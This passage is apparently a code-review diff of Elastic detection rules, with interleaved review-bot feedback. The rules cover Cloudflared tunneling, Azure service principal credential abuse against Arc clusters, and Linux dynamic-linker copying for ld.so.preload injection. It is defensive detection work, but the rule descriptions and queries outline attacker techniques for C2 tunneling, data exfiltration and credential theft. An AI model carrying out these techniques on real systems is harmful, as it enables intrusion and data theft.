"https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "d54b649d-46d0-4b4c-a9a7-1bc9fc458d3c_2", + "type": "security-rule" +} \ No newline at end of file 
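Review bot: The investigation guide in `note` has lost its module-name placeholders, leaving broken commands in the Possible investigation steps and Response sections: "modinfo -n " followed by "/sys/module//sections/*", and "modprobe -r "/"rmmod " — the angle-bracket placeholders were presumably stripped when the guide text was rendered, so restore them as plain names, e.g. `modinfo -n MODULE_NAME`, `/sys/module/MODULE_NAME/sections/*` and `modprobe -r MODULE_NAME`/`rmmod MODULE_NAME`. Several of the same bullets also end with a space before the `\n`, which renders as stray whitespace in the guide. In the query's final exclusion, `process.working_directory like "/tmp/newroot"` carries no wildcard and so matches only that exact directory; if the intent is to exclude the whole podman new-root subtree, `process.working_directory like "/tmp/newroot*"` would be needed — worth confirming against the case the exclusion was added for.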
diff --git a/packages/security_detection_engine/kibana/security_rule/d6702168-2be6-4d7d-a549-9bff67733df3_1.json b/packages/security_detection_engine/kibana/security_rule/d6702168-2be6-4d7d-a549-9bff67733df3_1.json
new file mode 100644
index 00000000000..fc7dabca67c
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/d6702168-2be6-4d7d-a549-9bff67733df3_1.json
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Generates a detection alert for each IBM QRadar offense written to the configured indices. Enabling this rule allows you to immediately begin investigating IBM QRadar offense alerts in the app.", + "from": "now-2m", + "index": [ + "logs-ibm_qradar.offense-*" + ], + "interval": "1m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 1000, + "name": "IBM QRadar External Alerts", + "note": "## Triage and analysis\n\n### Investigating IBM QRadar External Alerts\n\nIBM QRadar is a Security Intelligence Platform that provides SIEM, log management, anomaly detection, and incident forensics. The rule promotes QRadar offense records as Elastic detection alerts, enabling analysts to investigate potential threats with full offense context including rule names, severity, and status.\n\n### Possible investigation steps\n\n- Review the offense details including rule name, description, and categories to understand the nature of the alert.\n- Examine the offense severity and status (OPEN, HIDDEN, etc.) to prioritize investigation.\n- Cross-reference the offense with QRadar console for additional context including contributing events and log sources.\n- Investigate source and destination networks, device count, and event count associated with the offense.\n- Consult the IBM QRadar investigation guide and resources tagged in the alert for specific guidance on handling similar threats.\n\n### False positive analysis\n\n- Offenses triggered by routine administrative activities or known maintenance can be false positives. Review the offense context and create exceptions for scheduled activities.\n- Legitimate security testing or penetration testing may generate offenses. 
Coordinate with security teams to whitelist these during scheduled tests.\n- Low-severity offenses from specific rules that are known to produce noise can be excluded by creating rule exceptions.\n- Offenses from development or test environments may not require investigation. Consider excluding these environments if appropriate.\n\n### Response and remediation\n\n- Isolate affected systems if malicious activity is confirmed to prevent lateral movement.\n- Review the offense details to identify compromised accounts, credentials, or systems and take appropriate remediation steps.\n- Apply relevant security patches or updates to address any exploited vulnerabilities.\n- Escalate to the security operations center (SOC) or incident response team for further analysis if the threat appears significant.\n- Document the incident and update detection logic or exceptions based on findings.\n", + "query": "event.kind: alert and data_stream.dataset: ibm_qradar.offense\n", + "references": [ + "https://docs.elastic.co/en/integrations/ibm_qradar" + ], + "related_integrations": [ + { + "package": "ibm_qradar", + "version": "^0.1.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "data_stream.dataset", + "type": "constant_keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + } + ], + "risk_score": 47, + "risk_score_mapping": [ + { + "field": "ibm_qradar.offense.magnitude", + "operator": "equals", + "value": "" + } + ], + "rule_id": "d6702168-2be6-4d7d-a549-9bff67733df3", + "rule_name_override": "rule.name", + "setup": "## Setup\n\n### IBM QRadar Offense Integration\nThis rule is designed to capture offense events generated by the IBM QRadar integration and promote them as Elastic detection alerts.\n\nTo capture IBM QRadar offenses, install and configure the IBM QRadar integration to ingest offense records into the `logs-ibm_qradar.offense-*` index pattern.\n\nIf this rule is enabled alongside the External Alerts promotion rule (UUID: 
eb079c62-4481-4d6e-9643-3ca499df7aaa), you may receive duplicate alerts for the same QRadar events. Consider adding a rule exception for the External Alert rule to exclude data_stream.dataset:ibm_qradar.offense to avoid receiving duplicate alerts.\n\n### Additional notes\n\nFor information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).\n", + "severity": "medium", + "severity_mapping": [ + { + "field": "event.severity", + "operator": "equals", + "severity": "low", + "value": "21" + }, + { + "field": "event.severity", + "operator": "equals", + "severity": "medium", + "value": "47" + }, + { + "field": "event.severity", + "operator": "equals", + "severity": "high", + "value": "73" + }, + { + "field": "event.severity", + "operator": "equals", + "severity": "critical", + "value": "99" + } + ], + "tags": [ + "Data Source: IBM QRadar", + "Use Case: Threat Detection", + "Resources: Investigation Guide", + "Promotion: External Alerts" + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "d6702168-2be6-4d7d-a549-9bff67733df3_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d6e1b3f0-8a2c-4e7d-b5f9-1c0e3a6d8b2f_1.json b/packages/security_detection_engine/kibana/security_rule/d6e1b3f0-8a2c-4e7d-b5f9-1c0e3a6d8b2f_1.json new file mode 100644 index 00000000000..7914fac648b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d6e1b3f0-8a2c-4e7d-b5f9-1c0e3a6d8b2f_1.json 
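Review bot: `risk_score_mapping` derives the alert risk score from `ibm_qradar.offense.magnitude`, while `severity_mapping` reads the ECS-normalised `event.severity` with the 21/47/73/99 values; if the integration forwards QRadar's magnitude unscaled (QRadar reports it on a 0–10 scale) rather than as a 0–100 value, the mapped risk score will sit at the bottom of Kibana's range and contradict the severity the same alert receives. Please confirm how the integration populates that field, or derive the risk score from the same normalised field the severity mapping uses. As a wording point, the False positive analysis bullet "Coordinate with security teams to whitelist these during scheduled tests." would read more precisely as `Coordinate with security teams to add rule exceptions for these during scheduled tests.`, matching the exception mechanism the next bullet refers to.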
@@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of Cloudflare Tunnel (cloudflared) to expose a local service or create an outbound tunnel. Adversaries may abuse quick tunnels (e.g. tunnel --url http://127.0.0.1:80) or named tunnels to proxy C2 traffic or exfiltrate data through Cloudflare's edge while evading direct connection blocking.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via Cloudflared", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via Cloudflared\n\nCloudflare Tunnel (cloudflared) is a legitimate tool for exposing local services through Cloudflare's edge. Adversaries abuse it to create quick or named tunnels for C2, data exfiltration, or ingress tool transfer while evading direct connection blocking.\n\n### Possible investigation steps\n\n- Confirm the process command line for `tunnel`, `--url`, or `tunnel run` to validate cloudflared tunnel usage.\n- Identify the parent process and process executable path; cloudflared run from temp or user writable locations is more suspicious than from Program Files.\n- For quick tunnel (`--url http://...`), identify the local URL and whether it could be a C2 callback or proxy.\n- Correlate with network data for outbound connections to Cloudflare IPs or trycloudflare.com-style hostnames around the same time.\n- Review the user and session that started the tunnel; look for other suspicious logon or execution from the same context.\n\n### False positive analysis\n\n- Legitimate use of Cloudflare Tunnel for development or internal services may trigger this rule; consider allowlisting by path or user for 
approved use cases.\n\n### Response and remediation\n\n- If unauthorized tunnel use is confirmed: isolate the host, terminate the cloudflared process, and block cloudflared or Cloudflare tunnel domains at DNS/firewall where policy permits.\n- Rotate credentials for any accounts that may have been exposed over the tunnel.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"cloudflared.exe\" or ?process.pe.original_file_name == \"cloudflared.exe\" or ?process.code_signature.subject_name : \"Cloudflare, Inc.\") and process.args : \"tunnel\"\n", + "references": [ + "https://developers.cloudflare.com/cloudflare-one/connections/connect-apps/install-and-setup/tunnel-useful-commands/", + "https://attack.mitre.org/techniques/T1572/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d6e1b3f0-8a2c-4e7d-b5f9-1c0e3a6d8b2f", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: 
SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "d6e1b3f0-8a2c-4e7d-b5f9-1c0e3a6d8b2f_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dacfbecd-7927-46a7-a8ba-feb65a2e990d_1.json b/packages/security_detection_engine/kibana/security_rule/dacfbecd-7927-46a7-a8ba-feb65a2e990d_1.json new file mode 100644 index 00000000000..5ef752f0e24 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dacfbecd-7927-46a7-a8ba-feb65a2e990d_1.json 
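Review bot: The three identity checks in `query` mix operators: `process.name : "cloudflared.exe"` and `?process.code_signature.subject_name : "Cloudflare, Inc."` are case-insensitive, but `?process.pe.original_file_name == "cloudflared.exe"` is an exact match, so a PE original file name cased differently would be caught only by the other two conditions; `?process.pe.original_file_name : "cloudflared.exe"` keeps all three consistent. Separately, `process.args : "tunnel"` also fires on management subcommands documented in the referenced Cloudflare page, such as `tunnel login` and `tunnel list`, which do not establish a tunnel; since the guide already tells triagers to look for `--url` or `tunnel run`, the False positive analysis section should name these subcommands as expected benign matches, e.g. `- Tunnel management commands such as "tunnel login", "tunnel list" or "tunnel create" match this rule without establishing a tunnel; check the full command line before escalating.`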
@@ -0,0 +1,160 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects when a service principal authenticates to Microsoft Entra ID and then lists credentials for an Azure Arc-connected Kubernetes cluster within a short time window. The `listClusterUserCredential` action retrieves tokens that enable kubectl access through the Arc Cluster Connect proxy. This sequence (service principal sign-in followed by Arc credential retrieval), represents the exact attack chain used by adversaries with stolen service principal secrets to establish a proxy tunnel into Kubernetes clusters. Service principals that authenticate externally (as opposed to managed identities) and immediately access Arc cluster credentials warrant investigation, particularly when the sign-in originates from an unexpected location or ASN.",
+ "false_positives": [
+ "CI/CD pipelines that authenticate as a service principal and then access Arc clusters as part of deployment workflows will trigger this rule. Identify and exclude known automation service principal app IDs.",
+ "Administrators using service principal credentials to manage Arc-connected clusters during maintenance windows may trigger this rule. Correlate with change management records."
+ ], + "from": "now-30m", + "index": [ + "logs-azure.signinlogs-*", + "logs-azure.activitylogs-*" + ], + "interval": "15m", + "investigation_fields": { + "field_names": [ + "@timestamp", + "azure.signinlogs.properties.app_id", + "azure.signinlogs.properties.app_display_name", + "azure.signinlogs.properties.service_principal_name", + "azure.signinlogs.category", + "azure.activitylogs.operation_name", + "azure.activitylogs.identity.claims.appid", + "azure.resource.id", + "source.ip", + "source.geo.country_name", + "source.geo.city_name", + "source.as.organization.name" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "Azure Service Principal Sign-In Followed by Arc Cluster Credential Access", + "note": "## Triage and analysis\n\n### Investigating Azure Service Principal Sign-In Followed by Arc Cluster Credential Access\n\nThis rule detects the complete attack entry point for Arc-proxied Kubernetes attacks: a service principal authenticates\nto Azure AD, then immediately retrieves Arc cluster credentials. 
This is the prerequisite sequence before any\nKubernetes-level activity can occur through the Arc proxy.\n\n### Possible investigation steps\n\n- Identify the service principal using the `app_id` from the sign-in event and resolve it in Azure AD \u2014 is this a\n known application?\n- Check the sign-in source IP and geolocation \u2014 does it match expected infrastructure locations for this SP?\n- Review when the SP credentials were last rotated \u2014 stale credentials are more likely compromised.\n- Check the ASN of the sign-in source \u2014 is it from a known cloud provider, corporate network, or unexpected consumer ISP?\n- Examine Azure Activity Logs after the credential listing for any Arc-proxied operations (secret/configmap CRUD).\n- Correlate with Kubernetes audit logs for operations by the Arc proxy service account\n (`system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa`) in the same time window.\n- Review Azure AD Audit Logs for recent changes to this SP (new credentials, federated identities, owner changes).\n\n### Response and remediation\n\n- Immediately rotate the service principal credentials (secrets and certificates).\n- Revoke active sessions and tokens for the SP.\n- Review and remove any unauthorized Azure role assignments on Arc-connected clusters.\n- Check Kubernetes audit logs for any operations performed through the Arc proxy after credential access.\n- Rotate any Kubernetes secrets that may have been accessed through the proxy tunnel.\n- Enable conditional access policies to restrict service principal authentication by location if supported.\n", + "query": "sequence with maxspan=30m\n[authentication where event.dataset == \"azure.signinlogs\"\n and azure.signinlogs.category == \"ServicePrincipalSignInLogs\"\n and azure.signinlogs.properties.status.error_code == 0\n] by azure.signinlogs.properties.app_id\n[any where event.dataset == \"azure.activitylogs\"\n and azure.activitylogs.operation_name : 
\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/LISTCLUSTERUSERCREDENTIAL/ACTION\"\n and event.outcome : (\"Success\", \"success\")\n] by azure.activitylogs.identity.claims.appid\n", + "references": [ + "https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect", + "https://learn.microsoft.com/en-us/cli/azure/connectedk8s#az-connectedk8s-proxy", + "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins", + "https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence", + "https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.identity.claims.appid", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.app_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.status.error_code", + "type": "integer" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "dacfbecd-7927-46a7-a8ba-feb65a2e990d", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Azure Arc", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + 
"name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.007", + "name": "Container API", + "reference": "https://attack.mitre.org/techniques/T1552/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "dacfbecd-7927-46a7-a8ba-feb65a2e990d_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/db97a2aa-3ba5-4fa5-b8b9-bf42284edb5f_1.json b/packages/security_detection_engine/kibana/security_rule/db97a2aa-3ba5-4fa5-b8b9-bf42284edb5f_1.json new file mode 100644 index 00000000000..c40783e8911 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/db97a2aa-3ba5-4fa5-b8b9-bf42284edb5f_1.json 
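Review bot: The lookback `"from": "now-30m"` is equal to the sequence's `maxspan=30m` while the rule runs every `"interval": "15m"`, so a service principal sign-in and a `listClusterUserCredential` call that are close to 30 minutes apart are only both inside the query window for a narrow slice of runs and can be missed; the usual pattern for sequence rules is a lookback longer than maxspan plus interval, e.g. `"from": "now-50m"`, and the detection engine deduplicates the repeated hits. Separately, the second step joins on `azure.activitylogs.identity.claims.appid`, which `required_fields` declares with `"type": "unknown"`; if that field is not actually mapped in the activity-logs index, the `by` join never matches and the rule is silently inert, so it is worth confirming against the integration's field definitions before release. A short EQL comment above the second step, `// join key: app ID claim of the service principal that called the Arc API`, would also make the cross-dataset join easier to maintain.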
@@ -0,0 +1,182 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects when an Azure service principal authenticates from multiple countries within a short time window, which may indicate stolen credentials being used from different geographic locations. Service principals typically authenticate from consistent locations tied to their deployment infrastructure. Authentication from multiple countries in a brief period suggests credential compromise, particularly when the source countries do not align with the organization's expected operating regions. This pattern has been observed in attacks using stolen CI/CD credentials, phished service principal secrets, and compromised automation accounts.",
+ "false_positives": [
+ "Service principals used by globally distributed CI/CD systems (e.g., GitHub Actions runners in multiple regions) may legitimately authenticate from different countries. Baseline the expected geographic distribution for each service principal.",
+ "VPN or proxy usage by administrators managing service principals from different locations may produce multi-country sign-in patterns. Correlate with the administrator's known travel or access patterns."
+ ], + "from": "now-8h", + "interval": "1h", + "investigation_fields": { + "field_names": [ + "azure.signinlogs.properties.service_principal_id", + "azure.signinlogs.properties.app_display_name", + "Esql.source_geo_country_iso_code_count_distinct", + "Esql.source_geo_country_name_values", + "Esql.source_geo_city_name_values", + "Esql.source_ip_values", + "Esql.source_ip_country_pair_values", + "Esql.source_network_org_name_values", + "Esql.resource_display_name_values", + "Esql.app_id_values", + "Esql.app_owner_tenant_id_values", + "Esql.source_ip_count_distinct", + "Esql.source_geo_city_name_count_distinct", + "Esql.source_network_org_name_count_distinct", + "Esql.timestamp_first_seen", + "Esql.timestamp_last_seen", + "Esql.event_count" + ] + }, + "language": "esql", + "license": "Elastic License v2", + "name": "Azure Service Principal Authentication from Multiple Countries", + "note": "## Triage and analysis\n\n### Investigating Azure Service Principal Authentication from Multiple Countries\n\nService principals are non-interactive identities used for automation and application access. Unlike user accounts,\nthey rarely change geographic location. 
Authentication from multiple countries in a short window is a strong indicator\nof credential compromise.\n\n### Possible investigation steps\n\n- Identify the service principal using the `app_id` and `app_display_name` from the alert.\n- Review the list of countries and source IPs \u2014 do they match known infrastructure locations?\n- Check when the service principal credentials were last rotated \u2014 stale credentials are more likely compromised.\n- Investigate what resources were accessed after authentication using Azure Activity Logs and Graph Activity Logs.\n- Correlate with Azure AD Audit Logs for recent changes to the service principal (new credentials, federated\n identities, owner changes).\n- Check if the service principal has Azure Arc or Kubernetes-related role assignments, which could indicate\n targeting of cluster resources.\n\n### False positive analysis\n- If the service principal is used by a CI/CD pipeline, check if the different countries align with known runner locations. 
Baseline the expected geographic distribution for that SP.\n- If administrators manage the SP, correlate with known travel patterns or VPN usage that could explain multi-country access.\n\n### Response and remediation\n\n- Immediately rotate the service principal credentials (secrets and certificates).\n- Revoke active sessions and tokens.\n- Review and remove any unauthorized role assignments.\n- Audit resources accessed from the suspicious locations.\n- Enable conditional access policies to restrict service principal authentication by location if supported.\n", + "query": "FROM logs-azure.signinlogs-* metadata _id, _index\n| WHERE event.dataset == \"azure.signinlogs\"\n AND azure.signinlogs.category == \"ServicePrincipalSignInLogs\"\n AND azure.signinlogs.properties.status.error_code == 0\n AND source.geo.country_iso_code IS NOT NULL\n AND azure.signinlogs.properties.service_principal_id IS NOT NULL\n AND NOT azure.signinlogs.properties.app_owner_tenant_id IN (\n \"f8cdef31-a31e-4b4a-93e4-5f571e91255a\",\n \"72f988bf-86f1-41af-91ab-2d7cd011db47\"\n )\n\n| EVAL\n Esql.source_ip_string = TO_STRING(source.ip),\n Esql.source_ip_country_pair = CONCAT(Esql.source_ip_string, \" - \", source.geo.country_name)\n\n| STATS\n Esql.source_geo_country_iso_code_count_distinct = COUNT_DISTINCT(source.geo.country_iso_code),\n Esql.source_geo_country_name_values = VALUES(source.geo.country_name),\n Esql.source_geo_city_name_values = VALUES(source.geo.city_name),\n Esql.source_ip_values = VALUES(source.ip),\n Esql.source_ip_country_pair_values = VALUES(Esql.source_ip_country_pair),\n Esql.source_network_org_name_values = VALUES(`source.as.organization.name`),\n Esql.resource_display_name_values = VALUES(azure.signinlogs.properties.resource_display_name),\n Esql.app_id_values = VALUES(azure.signinlogs.properties.app_id),\n Esql.app_owner_tenant_id_values = VALUES(azure.signinlogs.properties.app_owner_tenant_id),\n Esql.source_ip_count_distinct = COUNT_DISTINCT(source.ip),\n 
Esql.source_geo_city_name_count_distinct = COUNT_DISTINCT(source.geo.city_name),\n Esql.source_network_org_name_count_distinct = COUNT_DISTINCT(`source.as.organization.name`),\n Esql.timestamp_first_seen = MIN(@timestamp),\n Esql.timestamp_last_seen = MAX(@timestamp),\n Esql.event_count = COUNT(*)\n BY azure.signinlogs.properties.service_principal_id, azure.signinlogs.properties.app_display_name\n\n| WHERE Esql.source_geo_country_iso_code_count_distinct >= 2\n| KEEP *\n", + "references": [ + "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins", + "https://learn.microsoft.com/en-us/entra/identity/conditional-access/workload-identities", + "https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/", + "https://www.wiz.io/blog/lateral-movement-risks-in-the-cloud-and-how-to-prevent-them-part-3-from-compromis" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.app_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.app_owner_tenant_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.resource_display_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_geo_city_name_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_geo_city_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_geo_country_iso_code_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_geo_country_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_ip_country_pair_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip_values", + "type": "ip" + }, + { + 
"ecs": false, + "name": "Esql.source_network_org_name_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_network_org_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.timestamp_first_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.timestamp_last_seen", + "type": "date" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.app_display_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.service_principal_id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "db97a2aa-3ba5-4fa5-b8b9-bf42284edb5f", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 1 + }, + "id": "db97a2aa-3ba5-4fa5-b8b9-bf42284edb5f_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_215.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_215.json new file mode 100644 index 00000000000..c0541e415a7 --- /dev/null 
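Review bot: The two `app_owner_tenant_id` values excluded in the first `WHERE` (`f8cdef31-…` and `72f988bf-…`) are unexplained magic GUIDs; they appear to be the Microsoft first-party tenants, and an ES|QL comment on the line above them, `// exclude Microsoft first-party applications by app owner tenant`, would stop a maintainer from removing or "fixing" them. `| KEEP *` at the end of the query is a no-op after `STATS` (only the aggregated and `BY` columns remain, so the `metadata _id, _index` requested in `FROM` are already gone) and can be dropped. With `"from": "now-8h"` and `"interval": "1h"`, the same multi-country service principal will presumably be reported on every hourly run for up to eight hours because the aggregated rows are regenerated each time; if that is not intended, a shorter lookback or a sentence in the investigation guide noting the expected repetition would help analysts.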
+++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_215.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Dynamic Linker Copy", + "note": "## Triage and analysis\n\n### Investigating Dynamic Linker Copy\n\nThe Linux dynamic linker is responsible for loading shared libraries required by executables at runtime. It is a critical component of the Linux operating system and should not be tampered with. \n\nAdversaries may attempt to copy the dynamic linker binary and create a backup copy before patching it to inject and preload malicious shared object files. This technique has been observed in recent Linux malware attacks and is considered highly suspicious or malicious.\n\nThe detection rule 'Dynamic Linker Copy' is designed to identify such abuse by monitoring for processes with names \"cp\" or \"rsync\" that involve copying the dynamic linker binary (\"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\") and modifying the \"/etc/ld.so.preload\" file. Additionally, the rule checks for the creation of new files with the \"so\" extension on Linux systems. By detecting these activities within a short time span (1 minute), the rule aims to alert security analysts to potential malicious behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n### Possible investigation steps\n\n- Investigate the dynamic linker that was copied or altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE ( path = '/etc/ld.so.preload' OR path = '/lib64/ld-linux-x86-64.so.2' OR path =\\n'/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' OR path = '/usr/lib64/ld-linux-x86-64.so.2' OR path =\\n'/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' )\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT f.path, u.username AS file_owner, g.groupname AS group_owner, datetime(f.atime, 'unixepoch') AS\\nfile_last_access_time, datetime(f.mtime, 'unixepoch') AS file_last_modified_time, datetime(f.ctime, 'unixepoch') AS\\nfile_last_status_change_time, datetime(f.btime, 'unixepoch') AS file_created_time, f.size AS size_bytes FROM file f LEFT\\nJOIN users u ON f.uid = u.uid LEFT JOIN groups g ON f.gid = g.gid WHERE ( path = '/etc/ld.so.preload' OR path =\\n'/lib64/ld-linux-x86-64.so.2' OR path = '/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' 